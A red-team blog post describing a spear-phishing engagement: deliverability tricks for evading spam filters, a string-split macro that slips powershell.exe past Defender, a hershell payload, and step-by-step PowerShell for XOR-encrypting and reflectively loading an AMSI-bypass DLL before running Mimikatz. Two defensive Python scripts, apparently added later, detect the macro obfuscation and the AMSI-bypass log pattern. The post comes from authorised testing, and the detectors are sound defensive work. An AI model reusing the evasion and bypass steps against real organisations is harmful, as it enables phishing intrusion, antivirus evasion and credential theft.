Red Team Techniques: Gaining access on an external engagement through spear-phishing
[Image: meterpreter.png]

There have been a lot of posts about crafting red team phishing campaigns, and most are incomplete. Today, we're going to walk through one of our recent external engagements from start to initial access, including domain creation, crafting phishing content, considerations for bypassing spam filters and email gateways, generating undetectable payloads, and bypassing Windows protections such as AMSI. We compiled a list of references at the bottom of this post.

Customer names and related information have been anonymized for obvious reasons. Depending on the sophistication and length of your red team engagement, you will need to gauge how much time and effort you spend on each of the items below.


Deliverability considerations:
  • Origin of mail:
    • Sending mail from localhost (e.g. your laptop) using a script.
    • IP reputation in headers.
  • Recently commissioned VPS with no sender history.
  • Sending domain reputation and domain age (amount of time between domain creation and the date of your campaign).
  • Link reputation and domain age.
  • Use a high-reputation sender, like Mailchimp or Sendgrid, and verify your domain with these providers so you can send emails "From:" your domain, as opposed to "Delivered by Mailchimp for XXX".
  • Match the Return-path for targeted emails.
  • Configure SPF, DKIM, and DMARC.
  • Timing & frequency:
    • If you send 100 emails at once from a low reputation IP, you'll almost certainly get flagged as spam.
  • Valid SSL certs on sending domains and links in the email.
  • Broken links.
  • Amount of HTML content.
Engagement
We generally approach phishing campaigns in three ways during an engagement:
  1. Targeted campaign against specific individuals of interest.

  2. Mass campaign against all users gleaned from the recon phase. (There are lots of great resources for recon and creating a targetable list of email addresses. Here are a few: OSINT Resources for 2019, theHarvester, datasploit, awesome-osint on GitHub.)

  3. Submission via forms on target company's website, usually by setting up a fake company.
Each campaign uses a different domain so as not to impact the reputation or deliverability of other campaigns. Campaigns should begin from most subtle to most egregious. Should the company recognize they are being targeted, your future attempts could be more heavily scrutinized. We often use Mailchimp for delivery after verifying our domain and setting up email authentication. We've also had success with a G Suite account and SMTP authentication using custom scripts.
Due to time constraints (20 hours), we chose options two and three above. For both campaigns, we used a Word doc with macros.
Recon
An MX lookup of our target company showed they were using G Suite, so we could test campaigns against mock G Suite accounts to ensure we'd get through their protections.
Code:
dig target.com MX

Google does a decent job at filtering malicious attachments, so in campaign one we hosted the attachment on a high-reputation domain and in campaign two we hosted it on our own domain.
Campaign prep: generating a word doc macro and payload
For this engagement, we used a malicious Word doc with macros. We leveraged unicorn (thanks @hackingdave) to generate a PowerShell macro to download/exec our payload, and made a slight modification to bypass Defender at the time:
Code:
"po" & "w" & "er" & "s" & "he" & "l" & "l" & ".e" & "x" & "e" & " "
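
A defender-side counterpart, added here as an example and not part of the original post: a small scanner that reassembles "&"-concatenated VBA string literals (like the line above) so a reviewer sees the command the fragments spell out. The macro lines, token list and fragment threshold are constructed assumptions.

```python
import re

# Constructed sample macro lines (not from the original post). Line 1
# assembles "powershell.exe " from short literals, line 2 is benign,
# line 3 splits a COM object name in two.
SAMPLE_MACRO_LINES = [
    'cmd = "po" & "w" & "er" & "s" & "he" & "l" & "l" & ".e" & "x" & "e" & " "',
    'MsgBox "Document loaded"',
    'Set sh = CreateObject("WS" & "cript.Shell")',
]

# Names a reviewer wants surfaced even when split across literals (assumed list).
SUSPICIOUS_TOKENS = ("powershell", "wscript.shell", "cmd.exe", "shell.application")

# A run of two or more double-quoted literals joined by '&'.
_CONCAT_RUN = re.compile(r'"[^"]*"(?:\s*&\s*"[^"]*")+')
_LITERAL = re.compile(r'"([^"]*)"')


def reassemble_literals(line):
    """Return every string a line builds by '&'-concatenating literals."""
    joined = []
    for run in _CONCAT_RUN.finditer(line):
        joined.append("".join(_LITERAL.findall(run.group(0))))
    return joined


def scan_macro(lines):
    """Yield (line_no, reassembled_string, matched_tokens) for suspect lines.

    A line is reported when the reassembled string contains a known token,
    or when it is built from many tiny fragments (avg <= 2 chars each),
    which is the obfuscation pattern itself regardless of what it spells.
    """
    findings = []
    for n, line in enumerate(lines, 1):
        nfrag = len(_LITERAL.findall(line))
        for s in reassemble_literals(line):
            hits = [t for t in SUSPICIOUS_TOKENS if t in s.lower()]
            if hits or (nfrag >= 5 and len(s) / nfrag <= 2):
                findings.append((n, s.strip(), hits))
    return findings


if __name__ == "__main__":
    for line_no, text, hits in scan_macro(SAMPLE_MACRO_LINES):
        print(f"line {line_no}: {text!r} tokens={hits}")
```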

We used hershell for our payload, an awesome lightweight stage 1 written in Go, whose x86 arch was undetectable at the time. If your payload is getting flagged, you have options for obfuscation and encryption, and can also manually bypass AV signatures if you know your target environment using something like dsplit. Here are some resources:
https://resources.infosecinstitute.com/antivirus-evasion-tools/
https://github.com/PowerShellMafia/PowerSploit/blob/master/AntivirusBypass/Find-AVSignature.ps1
http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html
Metasploit 5 was also recently released with built-in payload encryption and evasion payloads, but we haven't had a chance to use them.

AMSI bypass

We anticipated the need to run custom PowerShell payloads, so we'd have to bypass a recent Windows protection called AMSI. According to Microsoft, AMSI stands for Antimalware Scan Interface, and allows programs (like PowerShell) to submit content to a scanning engine prior to execution. Credit goes to CyberArk for their initial research into bypassing AMSI, and to Andre Marques for his write-up. We were able to adapt their implementations, which were getting flagged by Microsoft at the time, to bypass AMSI using XOR encryption.


Code:
1. Re-compile the AMSI Bypass DLL
2. Convert the binary to base64
   $base64string = [Convert]::ToBase64String([IO.File]::ReadAllBytes("$pwd\\bypass.dll"))
3. XOR encrypt
   foreach($byte in [Text.Encoding]::UTF8.GetBytes($base64string)) { $encrypted += $byte -bxor 1 }
4. Print encrypted buf as a byte array
   foreach($byte in $encrypted){ Write-Host -nonewline "$byte," }

On Target

1. Split encrypted buf due to powershell line limit lengths
2. Concat the buf
   $xorencrypted = $a + $b + $c + $d + $e + $f + $g
3. Decrypt the buf
   foreach($byte in $xorencrypted){$decrypted += $byte -bxor 1 }
4. Get buf as base64
   $base64string = [Text.Encoding]::UTF8.GetString($decrypted)
5. Load the DLL using reflection
   function Bypass-AMCEE { if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMCEE").Type) { [Reflection.Assembly]::Load([Convert]::FromBase64String($base64string)) | Out-Null } [Bypass.AMCEE]::Subvert(); }
6. Call the bypass method
   Bypass-AMCEE

This allows us to execute powershell payloads again in memory, such as Mimikatz.
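
Added here as a detection example, not part of the original post: the on-target steps above leave a recognisable shape in PowerShell ScriptBlock logging (Event ID 4104), namely chunk reassembly, an XOR loop, a base64 decode and a reflective Assembly.Load in one block. The scorer below runs over two constructed script-block bodies; the signal regexes, weights and threshold are assumptions to tune against your own logs.

```python
import re

# Constructed sample ScriptBlock texts (what a 4104 event body would carry);
# not taken from the original post.
SUSPECT_BLOCK = r'''
$xorencrypted = $a + $b + $c + $d + $e + $f + $g
foreach($byte in $xorencrypted){ $decrypted += $byte -bxor 1 }
$base64string = [Text.Encoding]::UTF8.GetString($decrypted)
[Reflection.Assembly]::Load([Convert]::FromBase64String($base64string)) | Out-Null
'''
BENIGN_BLOCK = r'''
$files = Get-ChildItem -Path C:\Logs -Filter *.log
foreach($f in $files){ Compress-Archive -Path $f.FullName -DestinationPath "$($f.BaseName).zip" }
'''

# (name, pattern, weight). Each signal is weak alone; together they describe
# the "reassemble -> XOR-decrypt -> base64-decode -> load in memory" chain.
SIGNALS = [
    ("reflective_load",  re.compile(r"\[Reflection\.Assembly\]::Load\b", re.I), 4),
    ("base64_decode",    re.compile(r"\[Convert\]::FromBase64String", re.I), 2),
    ("xor_loop",         re.compile(r"foreach\s*\(.*\)\s*\{[^}]*-bxor", re.I), 3),
    ("chunk_reassembly", re.compile(r"\$\w+\s*=\s*(?:\$\w+\s*\+\s*){3,}\$\w+"), 2),
    ("bytes_to_string",  re.compile(r"\[Text\.Encoding\]::\w+\.GetString", re.I), 1),
]
THRESHOLD = 6  # assumed; reflective load plus any two others trips it


def score_scriptblock(text):
    """Return (score, [matched signal names]) for one script block body."""
    matched = [name for name, rx, _ in SIGNALS if rx.search(text)]
    score = sum(w for name, _, w in SIGNALS if name in matched)
    return score, matched


def is_suspicious(text):
    return score_scriptblock(text)[0] >= THRESHOLD


if __name__ == "__main__":
    for label, block in (("suspect", SUSPECT_BLOCK), ("benign", BENIGN_BLOCK)):
        score, hits = score_scriptblock(block)
        print(f"{label}: score={score} signals={hits} alert={score >= THRESHOLD}")
```

In production the block text comes from the ScriptBlockText field of Microsoft-Windows-PowerShell/Operational events; the scorer is deliberately content-based so that splitting the payload across several `$a`..`$g` chunks does not hide it.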

You can grab a working AMSI bypass (as of 02/13/19) here.

Read more at the original blog post:
https://blog.sublimesecurity.com/red-tea...-phishing/
AMSI bypass Github link